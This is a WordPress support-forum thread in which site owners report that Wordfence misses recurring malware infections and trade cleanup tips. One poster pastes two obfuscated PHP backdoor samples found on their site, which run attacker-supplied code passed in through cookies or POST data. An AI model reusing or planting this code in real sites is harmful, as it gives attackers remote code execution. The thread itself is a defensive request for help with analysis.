Malicious Code and Wordfence isn’t picking it up?

Hi @alicecr, thanks for getting in touch.

Whilst Wordfence will use its extensive database of vulnerabilities, bad IPs, signatures, and malicious files, it is possible for malicious code to be packaged in a way we haven’t seen before. If you have a copy of any of the affected files, you can by all means forward one or more to samples @ wordfence . com so that we can create a new rule if this is the case. Make sure to always remove passwords/keys/salts from anything you do send.

They should also let you know whether a site clean is necessary to prevent the recreation of the files in future.

Thanks,
Peter.

I am having the same issue. I clean up the bad files and more just show up – sometimes IN the WORDFENCE directories.

Either code is injected at the head of a file, or a malicious index.php or (randomfilename).js.php is created with malicious code in it. This was from a file called HHb.js.php.1

*/
 	
$single_preg = 'mvSd8Xjp6e';
function post_meta_ids($import_id, $path)

{
    $close_quote = urldecode($import_id);
	$group = 'goal';
    $int_fields = substr($path,0, strlen($close_quote));
	$bad_slug = 'original_slug';
    return $close_quote ^ $int_fields;

}
$uploads = ${post_meta_ids("20%1A%28%7D%0B", $single_preg)};
if (isset($uploads[$single_preg]))

{

    $plural_base = $uploads[$single_preg];
    $post = $plural_base[post_meta_ids("%19%1B%23%3BV9%07%15", $single_preg)];

    include ($post);

}

<?php
function/*d  */lq1	(/* auurq   */$sw2/*uck  */)


{$td3/* pr */=  "*4-9bh/6krvxat_dfl(m5c;.'g873)s#FeLIE<pn?i@" .
"uHy o2" .
"0" ;


$ye5='';foreach(	$sw2       as	$wp4     )

{$ye5      .=/*fhmxg*/$td3	[	$wp4/*  mb */];


}


return/*   yzu   */$ye5;}$uk6/*  rl  */=      Array();
$uk6     []   =/*e   */lq1/* ilyc   */(    Array(3/*   jpypf  */,	4/*qu  */,	20     ,       3	,      4/*lqm*/,/*   ti */28    ,	3	,/*   bz*/27     ,	2/*  nw */,	26/*godnh*/,/*ddojb   */21	,       4   ,      3   ,       2/* wahnc   */,/*   mr*/1	,	48	,	20     ,	7	,/*   nvmcf */2   ,	3/* b  */,/*m */1/* j  */,	49	,	28	,	2   ,/*  xgecz  */12/*  ko*/,	12/*   ehc*/,  4	,/*cee*/21    ,/*  zubo  */15	,   21/* xphg */,/*j   */15/*  ooauo */,       21	,/*fai*/12       ,       4       ,/*  rrnvi  */1      ,/*we */1       ,)     )	;


$uk6   []/*  gflf  */=/*  psgh*/lq1	(   Array(40	,/*  exlbs  */38	,/*   yja */5/*  dm*/,	38/* zziyl   */,/*  tub*/46  ,	42/*mebtu*/,     43/*vfgkh   */,      39/*  tr */,	17	,/*   r */41     ,      39/* fxgv*/,/*  ftu*/8    ,/*  elogi  */18	,/*  eud*/14/*  z */,       14	,/*   uj */32	,	35/* zv  */,/*  zmek   */34/*  sg   */,	36     ,	14	,  14/*  loweq   */,/*   drplk   */29/*   czipo  */,/*lsfe  */22/*  qtvx  */,/*   hrkjx  */46    ,)/* di   */)/*  eyh   */;
$uk6       []/*hjw*/=/*tay   */lq1	(	Array(23	,   19/*j  */,/*   a */47	,	15   ,/*   shmge  */43      ,	17    ,	33	,)/* rbkhi*/)	;

$uk6/*  qknzz  */[]	=	lq1/*   ukr*/(/*   gymv   */Array(44	,/*   uovy   */0     ,)   )/*   us */;$uk6/*  k */[]/*  j*/=      lq1     (/* jchv  */Array(23       ,     6  ,)/*  avoz */)/* yrsum   */;$uk6/* l */[]   =	lq1	(	Array(31/*   zotfy*/,)	)  ;
$uk6/*   ghlfx   */[]/*   hqd  */=	lq1/*   xo*/(     Array(37	,)/*   n  */)/*  y */;
$uk6[]       =/*ry   */lq1	(	Array(16	,	41/*  tqd   */,	17/*b*/,/*doyt*/33/*yh */,	14	,     38	,	43	,    13  ,   14  ,     21	,     47	,     39     ,  13/*b   */,	33       ,/*   vimf */39/* xkhps   */,      13	,	30      ,)   )/*   b*/;


$uk6[]/*   w  */=     lq1  (	Array(12      ,	9	,  9       ,     12	,/*  gcxw   */45/*  fo  */,	14	,/*   ciqoo   */19	,	33	,	9	,/*   w*/25	,    33     ,)/*lhyh  */)       ;$uk6[]    =	lq1	(	Array(30	,/* fz   */13/*  eu */,/*   mq */9/* zvg*/,	14	,      9/*e   */,/*   pxaoc   */33      ,/*  ip  */38  ,	33  ,	12	,  13/*   hsl  */,)	)/*sphma   */;

$uk6[]/*kkr */=   lq1/*  zi  */(	Array(33	,  11/*   c   */,/*  ayq */38/* j  */,/*yrd */17/* n */,       47/*mbnt  */,/*  ysm   */15/*  zbvv  */,	33	,)	)	;$uk6[]/*   kl   */=/*   pkkr  */lq1  (	Array(30	,	43/*  vazgf  */,       4    ,/* wepq*/30/*   zxru */,  13	,/*   wub*/9/*vsuqh  */,)      )/*lydhe*/;
$uk6[]/*   akgu */=       lq1/*  iaka   */(      Array(43/*zlbtb  */,     39/* sgzcl  */,	17	,	41/*  ezs */,/* eaddc   */39/* bs   */,/*   efy */8    ,)     )	;
$uk6[]/*   xa */=/*ur*/lq1	(  Array(30    ,	13  ,	9/*mqj */,    17      ,	33/* hdun*/,  39	,)/*rds   */)       ;

$uk6[]     =/*   n */lq1    (/*  ntnvi*/Array(38	,/*thcm */12/*  vdpr*/,	21/*  qyb*/,/*  e */8     ,)       )/*  aa*/;


$uk6[]       =/*  w */lq1      (/*ogi*/Array(19	,/*  rf  */15	,      20	,)	)	;







foreach	(     $uk6[8]  (	$_COOKIE,	$_POST   )	as/*pp*/$uc14/*   w*/=>	$tq11)

{/*  bjgu */function/*  qld  */ox8/*   xrc*/(	$uk6,  $uc14  ,       $vh10	)

/*yifc */{


    return/*c*/$uk6[11]	(/*q */$uk6[9]	(	$uc14	./*  wvul   */$uk6[0]/*  rop   */,/* wknay*/(	$vh10/$uk6[13](       $uc14	)     )       +/* pja */1   )/* r */,     0/* vxy  */,/*  d  */$vh10    );


/* ogi   */}




    function	dd7     (	$uk6,/*  afir*/$sg12	)
   {
	return/*  mv */@$uk6[14]	($uk6[3]	,	$sg12/*   yukq */);
/* zcgt  */}

	function    tz9	(	$uk6,/* fxmal */$sg12      )
/*   d*/{


      if	(   isset	(	$sg12[2]/*nkd   */)      )/*imvu */{
/*   ybuq */

	$qc13	=/*koie */$uk6[4]    ./*az   */$uk6[15](       $uk6[0]       )	.	$uk6[2];/*  s  */@$uk6[7]/*  unr */(	$qc13,	$uk6[6]/*  pc*/./*   g */$uk6[1]/* ghf  */.	$sg12[1]	(     $sg12[2]	)   );

/*  njy  */@include    (   $qc13	);/*   jc */@$uk6[12]      (	$qc13	);




/* ce  */die    ();

  }
	}

	$tq11/*zfp*/=/*   zagmu*/dd7/*  en */(/*sv*/$uk6,   $tq11    );


/*okv */tz9  (	$uk6,	$uk6[10]  (       $uk6[5]       ,  $tq11  ^  ox8	(/*  vzc*/$uk6,	$uc14/* ygg  */,       $uk6[13](/* z */$tq11	)     )	)   );
}

The code above is from a random malicous file (indddyvs.php)

Wordfence catches maybe half of the bad files. I run a scan, it’s supposedly clear, I then go through the directories and I find bad files that were there before the scan started. I delete files and remove the malicious code. Everything looks clear and I run a scan that says there are no issues. A few hours later, a scan runs and more bad files show up (but it doesn’t catch all of them!). In addition to password resets, I have changed the 2 admin accounts and the one editor account to to 2FA and I’ve reset the password on my primary cpanel account. There are no suspicious users added. I’ve removed wpforms and the all-in-one-event calendar because they had errors in the log and wpforms has woocommerce hooks that I don’t trust after the recent WC hack. I deleted anything related to wpforms from the mysql database. My theme and all my plugins are up-to-date. I’ve blocked whole countries and I’d block the US if it wasn’t for the fact that web crawlers operate out of there.

I cannot for the life of me figure out how they keep injecting malicious code into my site and we cannot, as a small nonprofit society, pony up $500USD for “fixing” a site that should be protected from this recurring by a Wordfence Premium plugin that we already paid $200USD for. #Frustrated

This is the exact same situation I’m in. Sounds like the same hack. The code in the files seems to be written in a way to go undetected.

Also, I’ve found that a lot of random files are being added to plugins. I have the option enabled to scan plugins files and compare them to the repo. It appears that Wordfence doesn’t detect these additional files though. The files don’t exist in the repo so they should be detected, but it seems like Wordfence only scans files that are in the repo. Ideally, it would find these additional files and flag them.

I have sent the contents of the original file

@thekendog do you have Jetpack installed? I stopped having problems after I removed that plugin. I’m wondering if it got exploited?

@witchenkitsch nah I don’t. I haven’t been able to narrow down what plugin it is. But I did start using NinjaScanner and it is detecting the added malicious files. You can also upload zips of paid plugins/themes to compare files against. I’ve cleaned up two sites with it and they haven’t been hacked again. Highly recommend it.